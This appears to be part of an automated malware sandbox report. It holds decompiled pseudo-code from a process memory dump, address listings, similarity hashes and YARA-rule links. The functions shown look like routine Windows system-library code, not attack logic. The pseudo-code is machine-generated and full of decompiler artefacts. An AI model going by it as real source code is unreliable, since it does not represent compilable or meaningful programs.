																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0523d5f2
0x0523d5f5
0x0523d5f5
0x0523d5fd
0x0523d600
0x0523d60a
0x0523d60d
0x0523d617
0x0523d61d
0x0523d627
0x0523d62e
0x0523d911
0x0523d913
0x00000000
0x0523d919
0x0523d919
0x0523d919
0x0523d634
0x0523d634
0x0523d634
0x0523d634
0x0523d640
0x0523d8bf
0x00000000
0x0523d646
0x0523d646
0x0523d64d
0x0523d652
0x0528b2fc
0x0528b2fc
0x0528b302
0x0528b33b
0x0528b341
0x00000000
0x0528b304
0x0528b304
0x0528b319
0x0528b31e
0x0528b324
0x0528b326
0x0528b332
0x0528b347
0x0528b34c
0x0528b351
0x0528b35a
0x00000000
0x0528b328
0x0528b328
0x00000000
0x0528b328
0x0528b326
0x0523d658
0x0523d658
0x0523d65b
0x0523d665
0x00000000
0x0523d66b
0x0523d66b
0x0523d66b
0x0523d66b
0x0523d66d
0x0523d672
0x0523d67a
0x00000000
0x00000000
0x0523d680
0x0523d686
0x0523d8ce
0x0523d8d4
0x0523d8dd
0x0523d8e0
0x0523d68c
0x0523d691
0x0523d69d
0x0523d6a2
0x0523d6a7
0x0523d6b0
0x0523d6b5
0x0523d6e0
0x0523d6b7
0x0523d6b7
0x0523d6b9
0x0523d6b9
0x0523d6bb
0x0523d6bd
0x0523d6ce
0x0523d6d0
0x0523d6d2
0x0528b363
0x0528b365
0x00000000
0x0528b36b
0x00000000
0x0528b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0523d6bf
0x0523d6bf
0x0523d6e5
0x0523d6e7
0x0523d6e9
0x0523d6ec
0x0523d6ec
0x0523d6ef
0x0523d6f5
0x0523d6f9
0x0523d6fb
0x0523d6fd
0x0523d701
0x0523d703
0x0523d70a
0x0523d70a
0x0523d701
0x0523d710
0x0523d710
0x0523d6c1
0x0523d6c1
0x0523d6c6
0x0528b36d
0x0528b36f
0x00000000
0x0528b375
0x0528b375
0x0528b375
0x00000000
0x0528b375
0x00000000
0x0523d6cc
0x0523d6d8
0x0523d6d8
0x0523d6d8
0x00000000
0x0523d6c6
0x0523d6bf
0x00000000
0x0523d6da
0x0523d6da
0x0523d716
0x0523d71b
0x0523d720
0x0523d726
0x0523d726
0x0523d72d
0x00000000
0x0523d733
0x0523d739
0x0523d742
0x0523d750
0x0523d758
0x0523d764
0x0523d776
0x0523d77a
0x0523d783
0x0523d928
0x0523d92c
0x0523d93d
0x0523d944
0x0523d94f
0x0523d954
0x0523d956
0x0523d95f
0x0523d961
0x0523d973
0x0523d973
0x0523d956
0x0523d944
0x0523d92c
0x0523d78b
0x0528b394
0x0523d791
0x0523d798
0x0528b3a3
0x0528b3bb
0x0528b3bb
0x0523d7a5
0x0523d866
0x0523d870
0x0523d884
0x0523d892
0x0523d898
0x0523d89e
0x0523d8a0
0x0523d8a6
0x0523d8ac
0x0523d8ae
0x0523d8b4
0x0523d8b4
0x0523d8ae
0x0523d7a5
0x0523d78b
0x0523d7b1
0x0528b3c5
0x0528b3c5
0x0523d7c3
0x0523d7ca
0x0523d7e5
0x0523d7eb
0x0523d8eb
0x0523d8ed
0x00000000
0x0523d8f3
0x0523d8f3
0x0523d8f3
0x00000000
0x0523d8ed
0x0523d7cc
0x0523d7cc
0x0523d7d2
0x00000000
0x0523d7d4
0x0523d7d4
0x0523d7d7
0x0523d7df
0x0528b3d4
0x0528b3d9
0x0528b3dc
0x0528b3dc
0x0528b3df
0x0528b3e2
0x0528b468
0x0528b46d
0x0528b46f
0x0528b46f
0x0528b475
0x0523d8f8
0x0523d8f9
0x0523d8fd
0x0528b3e8
0x0528b3e8
0x0528b3eb
0x0528b3ed
0x00000000
0x0528b3ef
0x0528b3ef
0x0528b3f1
0x0528b3f4
0x0528b3fe
0x0528b404
0x0528b409
0x0528b40e
0x0528b410
0x0528b410
0x0528b414
0x0528b414
0x0528b41b
0x0528b420
0x0528b423
0x0528b425
0x0528b427
0x0528b42a
0x0528b42d
0x0528b42d
0x0528b42a
0x0528b432
0x0528b436
0x0528b438
0x0528b43b
0x0528b43b
0x0528b449
0x0528b44e
0x0528b454
0x0528b458
0x0528b458
0x0528b45d
0x00000000
0x0528b45d
0x0528b3ed
0x00000000
0x00000000
0x00000000
0x0523d7df
0x0523d7d2
0x0523d7ca
0x0528b37c
0x0528b37e
0x0528b385
0x0528b38a
0x00000000
0x0528b38a
0x0523d742
0x0523d7f1
0x0523d7f8
0x0528b49b
0x0528b49b
0x0523d800
0x0523d837
0x0523d843
0x0523d845
0x0523d847
0x0523d84a
0x0523d84b
0x0523d84e
0x0523d857
0x0523d802
0x0523d802
0x0523d80d
0x00000000
0x0523d818
0x0523d818
0x0523d824
0x0523d831
0x0528b4a5
0x0528b4ab
0x0528b4b3
0x0528b4b8
0x0528b4bb
0x00000000
0x0528b4c1
0x0528b4c1
0x0528b4c8
0x00000000
0x0528b4ce
0x0528b4d4
0x0528b4e1
0x0528b4e3
0x0528b4e5
0x00000000
0x0528b4eb
0x0528b4f0
0x0528b4f2
0x0523dac9
0x0523dacc
0x0523dacf
0x0523dad1
0x0523dd78
0x0523dd78
0x0523dcf2
0x00000000
0x0523dad7
0x0523dad9
0x0523dadb
0x00000000
0x00000000
0x0523dae1
0x0523dae1
0x0523dae4
0x0523dae6
0x0528b4f9
0x0528b4f9
0x0528b500
0x0523daec
0x0523daec
0x0523daf5
0x0523daf8
0x0523dafb
0x0523db03
0x0523db11
0x0523db16
0x0523db19
0x0523db1b
0x0528b52c
0x0528b531
0x0528b534
0x0523db21
0x0523db21
0x0523db24
0x0523dcd9
0x0523dce2
0x0523dce5
0x0523dd6a
0x0523dd6d
0x00000000
0x0523dd73
0x0528b51a
0x0528b51c
0x0528b51f
0x0528b524
0x00000000
0x0528b524
0x0523dce7
0x0523dce7
0x0523dce7
0x00000000
0x0523dce7
0x00000000
0x0523db2a
0x0523db2c
0x0523db31
0x0523db33
0x0523db36
0x0523db39
0x0523db3b
0x0523db66
0x0523db66
0x0523db3d
0x0523db3d
0x0523db3e
0x0523db46
0x0523db47
0x0523db49
0x0523db4c
0x0523db53
0x0523db55
0x0523db58
0x0523db5a
0x0528b50a
0x0528b50f
0x0528b512
0x0523db60
0x0523db60
0x0523db63
0x0523db63
0x00000000
0x0523db63
0x0523db5a
0x0523db3b
0x0523db24
0x0523db69
0x0523db69
0x0523db6c
0x0523db6f
0x0523db74
0x0528b557
0x0528b557
0x0528b55e
0x0523db7a
0x0523db7c
0x0523db7f
0x0523db82
0x0523db85
0x00000000
0x0523db8b
0x0523db8b
0x0523db8d
0x0523db9b
0x0523db9b
0x0523db9d
0x0523dba0
0x0523dba2
0x0523dba4
0x0523dba7
0x0523dba9
0x0523dbae
0x0523dbae
0x0523dbb1
0x0523dbb4
0x0523dbb4
0x0523dbb7
0x0523dbba
0x0523dcd2
0x0523dcd4
0x00000000
0x0523dbc0
0x0523dbc0
0x0523dbd2
0x0523dbd7
0x0523dbda
0x0523dbdd
0x0523dbdf
0x00000000
0x0523dbe5
0x0523dbe5
0x0523dbee
0x0523dbf1
0x0528b541
0x0528b544
0x00000000
0x0528b546
0x0528b546
0x00000000
0x0528b546
0x0523dbf7
0x0523dbf7
0x0523dbfd
0x0523dbfd
0x0523dbff
0x0523dc0b
0x0523dc15
0x0523dc1b
0x0523dc1d
0x0523dc21
0x0523dc21
0x0523dc23
0x0523dc23
0x0523dc26
0x0523dc29
0x0523dc2b
0x00000000
0x00000000
0x0523dc31
0x0523dc34
0x0523dc36
0x0523dcbf
0x0523dcbf
0x0523dcc2
0x00000000
0x0523dc3c
0x0523dc41
0x0523dc43
0x00000000
0x0523dc45
0x0523dc45
0x0523dc47
0x00000000
0x0523dc4d
0x0523dc4d
0x0523dc50
0x0523dc52
0x0523dc55
0x0523dcfa
0x0523dcfe
0x0523dd08
0x0523dd0a
0x0523dd0c
0x00000000
0x0523dd12
0x0523dd15
0x0523dd2d
0x0523dd2f
0x0523dd32
0x0523dd35
0x00000000
0x0523dd35
0x0523dc5b
0x0523dc5b
0x0523dc5e
0x0523dc61
0x0523dc64
0x0523dc67
0x0523dc67
0x0523dc6a
0x0523dc6c
0x0523dc8e
0x0523dc8e
0x0523dc91
0x0523dc93
0x0523dcce
0x0523dcce
0x0523dc95
0x0523dc9c
0x0523dc6e
0x0523dc72
0x0523dc75
0x0523dc77
0x0523dc79
0x0528b551
0x0528b551
0x00000000
0x0523dc7f
0x0523dc7f
0x0523dc81
0x00000000
0x0523dc83
0x0523dc86
0x0523dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0523dc88
0x0523dc81
0x0523dc79
0x0523dc6c
0x0523dc55
0x0523dc47
0x0523dc43
0x00000000
0x0523dc36
0x0523dc23
0x00000000
0x0523dbff
0x0523dbf1
0x0523dbdf
0x0523db8f
0x0523db92
0x0523db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0523db95
0x0523db8d
0x0523db85
0x0523db74
0x0523dc9f
0x0523dca2
0x0523dcb0
0x0523dcb0
0x0523dad1
0x0528b4e5
0x0528b4c8
0x00000000
0x00000000
0x00000000
0x0523d831
0x0523d80d
0x00000000
0x0523d800
0x0528b47f
0x0528b485
0x00000000
0x0528b485
0x0523d665
0x0523d652
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6325385416667114a142a8188d3ffe0b70d0e468008653b2e2c38b57a141638
Instruction ID: f70f8bb1c65fac79c27e2fb6c7b28ad0100e42e71f2774150d93b11c084528f7
Opcode Fuzzy Hash: f6325385416667114a142a8188d3ffe0b70d0e468008653b2e2c38b57a141638
Instruction Fuzzy Hash: 43E1F3B0B2531ACFDB24DF24C996B79B7B6BF45344F0401A9D80E9B290DB70A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0523849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0523849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x52ff9c0);
				E0527D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x5317b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0523CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E05242280( *[fs:0x30], 0x5318550);
						_t139 =  *0x5317b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0525F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0523FFB0(_t193, _t235, 0x5318550);
								L5:
								return E0527D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E05221C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x5317b9c; // 0x0
							_t235 = L05244620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x5317b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0525A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0523FFB0(_t193, _t235, 0x5318550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L052477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L052477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x5317b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x5317b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E052637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x5317b9c; // 0x0
									_t214 = L05244620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E052637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x5317b10 =  *0x5317b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x5317b04 =  *0x5317b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L052477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L052477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x5317b08 =  *0x5317b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E052657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0526F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L052477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0525A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L052477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E052696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0523849b
0x0523849b
0x0523849b
0x0523849b
0x0523849d
0x052384a2
0x052384a7
0x052384b1
0x052384d8
0x00000000
0x052384b3
0x052384c4
0x052384c9
0x052384cd
0x052384cf
0x052384cf
0x052384d6
0x052384e6
0x052384e9
0x052384ec
0x052384ef
0x052384f2
0x052384f4
0x052384fc
0x05238501
0x05238506
0x05238509
0x052386e0
0x052386e5
0x052386e8
0x052386ed
0x052386f0
0x052386f2
0x05289afd
0x05289b02
0x052384da
0x052384df
0x052384df
0x052386fa
0x052386fd
0x052386fe
0x05238701
0x05238706
0x05238709
0x0523870b
0x00000000
0x00000000
0x05238711
0x05238725
0x05238727
0x0523872a
0x0523872c
0x05289af0
0x05289af5
0x05238732
0x05238732
0x05238732
0x05238735
0x05238737
0x05238515
0x05238515
0x05238518
0x0523851d
0x05238523
0x05238527
0x0523852b
0x05238537
0x05238539
0x0523853c
0x0523853e
0x0523868c
0x05238691
0x05238699
0x0523869b
0x05238744
0x05238748
0x052386a1
0x052386a1
0x052386a1
0x052386a4
0x052386a8
0x05289bdf
0x05289bdf
0x052386ae
0x052386b0
0x00000000
0x052386b6
0x00000000
0x05289be9
0x052386b0
0x05238544
0x0523854a
0x0523854d
0x05238551
0x0523876e
0x05238778
0x0523877b
0x05238780
0x05238557
0x05238557
0x0523855d
0x0523855d
0x0523856b
0x0523856e
0x05238570
0x05238573
0x05238576
0x05238576
0x05238579
0x0523857b
0x00000000
0x00000000
0x05238581
0x052385a0
0x052385a2
0x052385a5
0x052385a7
0x05289b1b
0x05289b1b
0x0523862e
0x0523862e
0x05238631
0x05238631
0x05238634
0x05238636
0x05238669
0x05238669
0x0523866b
0x05289bbf
0x05289bc4
0x05289bc8
0x05289bce
0x05289bce
0x05238671
0x05238671
0x05238674
0x05238676
0x05289bae
0x05289bae
0x05238676
0x0523867c
0x0523867e
0x05238688
0x05238688
0x00000000
0x0523867e
0x05238638
0x05238638
0x0523863b
0x0523863e
0x0523863f
0x05238642
0x05238645
0x05238648
0x0523864d
0x05289b69
0x05289b6e
0x05289b7b
0x05289b81
0x05289b85
0x05289b89
0x05289ba7
0x05289b8b
0x05289b91
0x05289b9a
0x05289b9f
0x05289b9f
0x05238788
0x0523878d
0x05238763
0x05238763
0x05238766
0x00000000
0x05238766
0x05289b70
0x00000000
0x05289b70
0x05238656
0x0523865a
0x0523865c
0x05238752
0x05238756
0x00000000
0x00000000
0x0523875e
0x00000000
0x0523875e
0x05238662
0x05238662
0x05238662
0x05238666
0x00000000
0x05238666
0x052385b7
0x052385b9
0x052385bc
0x052385bf
0x052385cc
0x052385d1
0x052385d4
0x052385db
0x052385de
0x052385e0
0x05289b5f
0x00000000
0x05289b5f
0x052385e6
0x052385ea
0x052386c3
0x052386c5
0x052386c8
0x052386ca
0x05289b16
0x00000000
0x05289b16
0x052386d6
0x052385f6
0x052385f6
0x052385f9
0x05238602
0x05238606
0x0523860a
0x0523860b
0x0523860e
0x05238611
0x00000000
0x05238611
0x052385f3
0x00000000
0x052385f3
0x05238619
0x0523861e
0x0523861e
0x05238621
0x05238622
0x05238623
0x05238625
0x0523862c
0x00000000
0x0523873d
0x00000000
0x0523873d
0x05238737
0x0523850f
0x05238512
0x00000000
0x05238512
0x00000000
0x052384d6

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b43403d2ea355eeb4f05fc798a66f1e8403e4bc4a356064973b5360c03704c2
Instruction ID: ccb49f7ac6ef8edfc1e367598ebddb3b667ad073a0abe5e98fca6fb1cda58f00
Opcode Fuzzy Hash: 4b43403d2ea355eeb4f05fc798a66f1e8403e4bc4a356064973b5360c03704c2
Instruction Fuzzy Hash: 7EB16DB4F25209DFCB19DFE8C985AADBBBAFF44304F14412AE506AB245DB70A945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0525513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0525513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x531d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0526D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E05242280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L05244620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0526F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0523FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x531b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0526B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
